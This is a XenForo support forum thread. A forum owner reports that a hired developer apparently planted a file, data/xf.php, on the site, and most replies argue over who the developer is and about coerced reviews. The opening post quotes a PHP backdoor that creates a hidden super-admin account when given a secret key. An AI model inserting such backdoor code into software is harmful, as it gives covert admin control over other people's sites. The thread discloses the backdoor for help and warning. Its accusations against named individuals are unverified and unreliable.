XF 2.2 xenforo developer may have added an exploit file

MR X

MR X

Active member
so i hired a dev on fiverr to make me an addon, it took way to long to complete by the time frame so i fired him, then some time later re-hired him to actually finish it, garbage work was done, but apparently he may or may not have uploaded a file named xf.php in /home/domain-name/public_html/data/xf.php, this is not an official xenforo file is it? because within it is.

PHP: 
if ($key == 'dfdasfasfsjd544fjjkl') {
    // Create a new user with random credentials
    $registration = \XF::service('XF:User\Registration');
    $input['username'] = $randomString;
    $input['email'] = "$randomString@gmail.com";
    $input['password'] = $randomString;
    $registration->setFromInput($input);
    $registration->skipEmailConfirmation(true);
    $user = $registration->save();

    // Force admin privileges
    $user->secondary_group_ids = [3, 8, 5];  // Elevated groups
    $admin = \XF::app()->em()->create('XF:Admin');
    $admin->user_id = $user->user_id;
    $input['is_super_admin'] = true;
    $form->basicEntitySave($admin, $input);
    $form->run();

    echo $randomString;  // Prints the generated credentials
}

that is just the jist of what all was in it.

appreciate some support thank you.
 
Sort by date Sort by votes
MR X said:
he basically added a backdoor like i said, but he also added advertisement code so he can profit on my website, (ad code within the addon he was fixing up. (i would say the bad actors devs name, but i dont know if i can expose it on XF)
Click to expand...
I've seen call outs of bad devs here on xenforo. If he's using the site here to then do fraudulent or black hat work, we need to know who it is and you would be doing the community a great service. At the very least you should consider reporting this nabob to the admin here.
 
Upvote 0 Downvote
tajhay said:
Im curious, did you search up on fahad ashraf at all on this site? Seems like a lot of people hire devs without spending any time reading reviews... just make sure to ignore all the reviews from new users.

@forumSolution (tagged for no obvious relation to fahad....)
Click to expand...
no i didn't i was more needing to immediately hire a dev, should have did my research i will be doing that next time, well hopefully not a member of my community has 20+ years of web-dev experience so i think i am good now :)

also i thought all fiverr devs were checked by fiverr themselves i guess i was wrong.
 
Last edited:
Upvote 0 Downvote
Bob said:
Ya, definitely not me lol I don't have a Fiverr account (never have, never will). I am also extremely picky on what type of projects it take on. I can assure you that I'd never be interested in tiny project like this. Its large scale CMS and Sports type addons that I focus on.

Hope you find the dude and kick his ass.
Click to expand...
didn't have any doubt that it was you, also my addon is not no small feat but i also won't go into details but i will say it would be like combining your showcase addon, addonlabs thread filters addon & Thread Prefix Filter & Thread Thumbnail, as well as some other addons into 1 "portal" style addon for recently made threads.
 
Upvote 0 Downvote
Upvote 0 Downvote
MR X said:
well this is who i hired.
but again i am not entirely sure its the same dev.
Click to expand...
Pretty baffled to find a rating of 4,9 of 5 there, based on 117 reviews. All of them overly positive to an amount that is hard to believe. And - with very few exceptions - the work was done for 50-100€ or even less - which does not really fit the kind of work described in the reviews (and does not fit any serious amount of custom software development that is more than a tiny-tiny fix). It seems that the reviews are not trustable at least in the sense that if they are genuine the reviewers probably don't have the slightest technical clue about anything - like your grandma going to a car workshop. Just for the laughs one of the reviews as a screenshot:

Bildschirmfoto 2025-09-06 um 16.20.25.webp
Must have been a hell of a project - for less than 50€ and less than 1 day.
 
Upvote 0 Downvote
smallwheels said:
Pretty baffled to find a rating of 4,9 of 5 there, based on 117 reviews. All of them overly positive to an amount that is hard to believe. And - with very few exceptions - the work was done for 50-100€ or even less - which does not really fit the kind of work described in the reviews (and does not fit any serious amount of custom software development that is more than a tiny-tiny fix). It seems that the reviews are not trustable at least in the sense that if they are genuine the reviewers probably don't have the slightest technical clue about anything - like your grandma going to a car workshop. Just for the laughs one of the reviews as a screenshot:

View attachment 326539
Click to expand...
that and that dev basically pleads or harasses you to make a really good review.
 
Upvote 0 Downvote
MR X said:
without getting into it that review was a lie and i was basically strong armed into making it.

his addon was bad but not that bad but not what was needed (i also removed my review)
Click to expand...
Why not report to xenforo devs that you were strong armed by fahad uhh i mean @forumSolution into making that review?

Seriously, the people who are dunb enough to be forced to make reviews for him are just making it worse for everyone else that hires him.

And the xenforo team here thinks that is a diff person lol
 
Upvote 0 Downvote
tajhay said:
Why not report to xenforo devs that you were strong armed by fahad uhh i mean @forumSolution into making that review?

Seriously, the people who are dunb enough to be forced to make reviews for him are just making it worse for everyone else that hires him.

And the xenforo team here thinks that is a diff person lol
Click to expand...
forumsolution is a different dev then fahad i am pretty sure.
 
Upvote 0 Downvote
On XenForo, reviews are always voluntary, members are free to share their own experiences if they wish. If a developer provides good service and someone is satisfied, they may choose to leave a review, but there’s no way to compel this.

From what I’ve read in this thread, the matter seems to have stemmed from a Fiverr-related incident. However, I noticed that Tajhay directed criticism towards @forumsolutions, even though the original poster clarified they are two separate individuals.

It’s a bit concerning to see this misunderstanding go unresolved, and I do hope XenForo can provide some clarity. It’s important that members are not mistakenly associated with situations they are not part of.
 
Upvote 0 Downvote
pvpers said:
On XenForo, reviews are always voluntary, members are free to share their own experiences if they wish. If a developer provides good service and someone is satisfied, they may choose to leave a review, but there’s no way to compel this.

From what I’ve read in this thread, the matter seems to have stemmed from a Fiverr-related incident. However, I noticed that Tajhay directed criticism towards @forumsolutions, even though the original poster clarified they are two separate individuals.
Click to expand...
The review he left for the addon developed that he said he was forced to leave is on @forumSolution review thread.

Which he has now deleted.
 
Upvote 0 Downvote
tajhay said:
The review he left for the addon developed that he said he was forced to leave is on @forumSolution review thread.

Which he has now deleted.
Click to expand...
web.archive.org

ForumSolution-Complete services of forum (Development , Design , Migration and more)

Hi everyone, I have more than 10 years of experience working with clients on a different PHP projects Services: Custom Addon development services (xf1 $ xf2) Installation Migration from any framework on xenforo Convert xf1 addon on xf2 Custom Design Extend functionally of any existing addon...
web.archive.org web.archive.org
 
Last edited:
Upvote 0 Downvote
pvpers said:
stemmed from a Fiverr-related incident. However, I noticed that Tajhay directed criticism towards @forumsolutions, even though the original poster clarified they are two separate individuals.
Click to expand...
Why would the Fiverr dev point Mr X to that thread to post the coerced review, if it's two separate people? Defies logic.
 
Upvote 0 Downvote
Max Taxable said:
Why would the Fiverr dev point Mr X to that thread to post the coerced review, if it's two separate people? Defies logic.
Click to expand...
Let me explain the logic: we made a deal here on XenForo. I did some small work for him of course paid he was happy so then he gave me a review just like a normal client. I never forced him to write a review—why would I? I have no account on fiverr lol
 
Last edited:
Upvote -2 Downvote
You must log in or register to reply here.
Back
Top Bottom